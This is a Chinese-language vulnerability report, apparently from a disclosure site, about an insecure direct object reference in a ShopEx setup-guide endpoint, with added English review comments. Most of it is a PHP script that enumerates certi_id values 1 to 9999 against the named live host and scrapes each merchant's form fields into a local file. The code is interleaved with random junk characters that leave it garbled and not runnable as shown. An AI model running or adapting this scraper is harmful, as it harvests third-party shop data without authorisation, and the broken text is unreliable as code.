|
简要描述:
ShopEx某接口缺陷,可遍历所有网站
详细说明:
问题出现在 ShopEx 网店使用向导页面
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
refer 参数 base64 解码后为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
我们修改 certi_id 即可遍历所有使用了 ShopEx 程序的网站
<?php
! t" s& b/ X8 M6 X" z; B0 K* D$ S0 @+ A* }. E
// Reporter's PoC driver: calls ShowshopExD() for every candidate certi_id from
// 1 to 9999. The identifier is a small sequential integer supplied by the
// client, which is exactly what makes this enumeration feasible.
for ($i=1; $i < 10000; $i++) { // enumerate candidate certi_id values
3 B0 |1 Q& \# n, q6 ~" T; c
ShowshopExD($i);
- @* J) p3 V1 ]3 C; P M( K/ x( i. D5 n1 ]& g; G6 ]
}
5 t0 c. G& X1 ]! h: b+ G* L. J+ l6 s
// Reporter's proof-of-concept for one candidate certi_id.
// Encodes {"certi_id":<cid>,"callback_url":...} as base64 into the `refer`
// query parameter of step2.php, fetches the page with cURL and, when the
// response reflects that same `refer` value back, scrapes every
// <input type="text" .../> tag, echoing name:value pairs to stdout and
// appending them to c:/shopEx.txt.
// Security-relevant point: the certi_id is chosen by the client and nothing
// in the request ties it to an authenticated owner, so any record can be
// looked up by guessing. The page's closing remark ("refer换成其他加密方式")
// proposes a different client-side encoding; presumably a server-side
// ownership/authorisation check on certi_id (or an unguessable, signed token)
// is what actually closes the hole — TODO confirm.
function ShowshopExD($cid) {, {& w9 A2 w; Z# `: d: M/ W* j9 M
. Q: d% Q, i3 w. A! M' O- v! n, Y
// Target endpoint named in the write-up above.
$url='http://guide.ecos.shopex.cn/step2.php';" b0 k$ f, t, X6 b
// intval() forces certi_id to a bare integer in the JSON; the decoded sample
// on the page shows it quoted ('1051') — whether the server treats both forms
// alike is not shown here.
: X- y, D" r- z' j $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');9 h0 b) G0 Q) }2 j0 \# E
& K: ?' t3 A# M k' z3 V
// refer is passed as a plain query-string parameter.
$url = $url.'?refer='.$refer;
( {% e% t# ?/ d9 ~ x
% h! z/ J) p7 B6 W! n+ u9 d $ch = curl_init($url);
+ `9 k$ O* z- G9 s/ }3 l b5 D% l* V5 F, u& ~& s* }3 b4 Z
// Return the body as a string instead of printing it.
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
9 N9 L, B' m0 `3 Y2 t$ y/ h1 b- H! y q, ]. ]! t+ B$ ~
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
f% s6 V m7 w% { L" B8 Y8 C) d
// NOTE(review): no check for curl_exec() returning false; a failed request
// simply yields an empty string below.
8 J; j" \ A& P m5 X/ O' A5 m $result = curl_exec($ch);& G/ J% c) E2 E; Z( q
- d0 ] t9 B0 A. {1 }
// Re-encode the body from UTF-8 to GB2312 (to_encoding comes first),
// presumably for a GBK console. The base64 refer string is ASCII, so the
// strpos() test below is unaffected by the conversion.
$result = mb_convert_encoding($result, "gb2312", "UTF-8");+ B4 G4 M# [ w$ q" [
6 H, n8 m+ G1 [* y! o8 K5 ~
// Heuristic "this id exists" signal: the server echoes the submitted refer
// back into the page. NOTE(review): truthiness check rather than `!== false`,
// so a match at byte offset 0 would be treated as no match.
if(strpos($result,$refer))
# U. _" f; ?: ?8 ~ {* G5 \5 K& x! A5 H! Z* V/ U2 X1 H# d
{
8 o* j7 y5 v2 T( p4 b, r# V- {; S. z$ ^ y3 a# s
// Append mode; opened once per matching id and closed below.
$fp = fopen("c:/shopEx.txt",'ab'); // save to file
- Z& \) S1 D" U+ g6 \
// Capture the attribute text of every self-closing <input type="text" .../>.
( w* C- a0 I4 B: b) o- q preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);+ J% V1 g6 w5 ?/ r) D
. C4 x7 {3 _8 g2 Q x& B2 u7 v
foreach ($value[1] as $key) {
6 s( M2 ^) R$ \4 D# E0 x$ v2 H& Q2 k4 S e1 H4 E2 E
// Pull name="…" and value="…" out of one tag's attributes; only the first
// match of each group ([0]) is used below.
preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);3 N. ~/ L5 W' r- e$ w
, p0 \/ N- ]% W, W$ \& o% D
// Print and record the pair as name:value, one per line.
echo $res[1][0].':'.$res[3][0]."\r\n";
3 ^8 }/ w; a/ m& G# v& g8 I \& e7 W& I, p& V a4 j! R* C
$col =$res[1][0].':'.$res[3][0]."\r\n";
6 s; E3 P( U8 b, S: v8 m5 b2 M) G
// Explicit byte length; strlen() is correct here since $col is written as-is.
; J7 v7 l+ y# P: H! l fwrite($fp, $col, strlen($col));
- h7 C& l9 ]8 J. J* O9 S2 u1 ?4 X. {( O7 s( i
}: K2 v) E. Y5 B0 T7 J6 x
// Separator between records on stdout (not written to the file).
3 _) F e5 B% Y% g5 S; C echo '--------------------------------'."\r\n";3 ^+ W1 {! @4 o# K g
- i# d' r) N) p5 G0 N
fclose($fp); 7 g H# a) ~6 T7 q+ H
( X W+ ~& X! {, C. o! D1 x* f }. i6 u: h b( L9 F. m; ]0 J T9 g( ?
9 C$ g1 i, o, I. i. ~+ }! U
// Push buffered output so each record appears as it is found.
flush();
) c' ?. b- a" I, O+ o
' p* V1 K8 Y. B curl_close($ch);8 z* t3 ~- i" F0 Z% o( a& h
, j; u. a% Z/ J0 f9 m% i8 t7 C }
4 y8 I7 @# A' G" J& d( p8 k+ G
8 x; G d z" |, l?>* z# v$ r' S, t7 z7 {' H9 @. a
漏洞证明:
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
refer 换成其他加密方式
5 j$ h9 c* _. p |
|